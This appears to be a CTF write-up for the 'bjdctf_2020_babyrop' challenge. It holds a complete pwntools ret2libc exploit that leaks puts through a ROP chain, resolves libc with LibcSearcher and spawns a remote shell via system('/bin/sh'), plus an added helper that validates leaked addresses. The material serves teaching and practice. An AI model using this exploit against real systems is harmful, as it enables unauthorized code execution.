  • bjdctf_2020_babyrop

    The challenge does not ship a libc file, so the LibcSearcher module is used to look up offsets from the leaked puts address.

    from pwn import *
    from LibcSearcher import *

    context.log_level = 'debug'
    r = remote('node3.buuoj.cn', 28426)
    # r = process('./bjdctf_2020_babyrop')
    elf = ELF('./bjdctf_2020_babyrop')
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    main_addr = elf.symbols['main']
    pop_rdi = 0x0000000000400733  # pop rdi; ret gadget

    # Stage 1: overflow the 0x20-byte buffer plus the saved rbp, then call
    # puts(puts@got) to leak the libc address of puts and return to main
    # so a second payload can be sent.
    payload = b'a' * 0x20 + b'b' * 0x8
    payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
    r.recvuntil(b'Pull up your sword and tell me u story!')
    r.sendline(payload)
    r.recv()

    # puts stops at the first NUL, so only 6 bytes of the address arrive;
    # pad to 8 bytes before unpacking.
    puts_addr = u64(r.recv(6).ljust(8, b'\x00'))
    libc = LibcSearcher('puts', puts_addr)
    libc_base = puts_addr - libc.dump('puts')
    system_addr = libc_base + libc.dump('system')
    bin_addr = libc_base + libc.dump('str_bin_sh')

    # Stage 2: same overflow, now returning into system("/bin/sh").
    payload = b'a' * 0x20 + b'b' * 0x8
    payload += p64(pop_rdi) + p64(bin_addr) + p64(system_addr)
    r.recvuntil(b'Pull up your sword and tell me u story!')
    r.sendline(payload)

    r.interactive()
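    The two fragile steps in the script above are parsing the 6-byte leak (the `ljust(8, b'\x00')` idiom) and trusting whatever offsets LibcSearcher returns. As an added example, not part of the original writeup, the pure-Python helper below reproduces that arithmetic without pwntools and adds the check a practitioner wants before sending the second stage: a correct libc candidate must yield a page-aligned base, and the leak itself should look like a 64-bit userland pointer. The leaked bytes and the symbol offsets are constructed sample values, not taken from any real libc build.

```python
import struct

PAGE = 0x1000  # libc is mmap'ed page-aligned, so a correct base has its low 12 bits clear


def u64_leak(raw):
    """Unpack a partial little-endian address as puts() prints it.

    puts stops at the first NUL byte, so a 64-bit userland pointer usually
    arrives as 6 bytes; pad on the right with NULs before unpacking, which is
    what the ljust(8, b'\\x00') idiom in the exploit script does.
    """
    if not 1 <= len(raw) <= 8:
        raise ValueError("expected 1..8 leaked bytes, got %d" % len(raw))
    return struct.unpack('<Q', raw.ljust(8, b'\x00'))[0]


def looks_like_userland_ptr(addr):
    """Cheap plausibility check for an x86-64 Linux shared-library address.

    Canonical user addresses are below 2**47, and with the default kernel
    layout a library mapped by mmap lands in the 0x7f.. region.
    """
    return 0 < addr < (1 << 47) and (addr >> 40) == 0x7f


def resolve_libc(leaked_puts, puts_off, system_off, binsh_off):
    """Derive the libc base and target addresses from one leaked symbol.

    The candidate offsets (from LibcSearcher or any libc database) are only
    right if they produce a page-aligned base; a misaligned result means the
    leak was parsed wrongly or the wrong libc build was picked.
    """
    if not looks_like_userland_ptr(leaked_puts):
        raise ValueError("leak 0x%x does not look like a libc pointer" % leaked_puts)
    base = leaked_puts - puts_off
    if base & (PAGE - 1):
        raise ValueError("base 0x%x is not page-aligned; wrong libc candidate?" % base)
    return {
        'base': base,
        'system': base + system_off,
        'binsh': base + binsh_off,
    }


# Constructed sample input: a fake 6-byte leak (0x7ffff7a8da30 little-endian)
# and fake offsets; none of these come from a real libc.
SAMPLE_LEAK = b'\x30\xda\xa8\xf7\xff\x7f'
SAMPLE_OFFSETS = {'puts': 0x80a30, 'system': 0x4a2b0, 'binsh': 0x1a7e50}


def demo():
    """Run the leak-to-addresses pipeline on the constructed sample."""
    leak = u64_leak(SAMPLE_LEAK)
    return resolve_libc(leak, SAMPLE_OFFSETS['puts'],
                        SAMPLE_OFFSETS['system'], SAMPLE_OFFSETS['binsh'])


if __name__ == '__main__':
    for name, addr in demo().items():
        print("%-6s 0x%x" % (name, addr))
```

    If LibcSearcher offers several candidate builds, running each candidate's offsets through `resolve_libc` and discarding the ones that raise is a quick way to prune the list before trying the second stage against the remote.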
           
  • Original article: https://www.cnblogs.com/gaonuoqi/p/12312777.html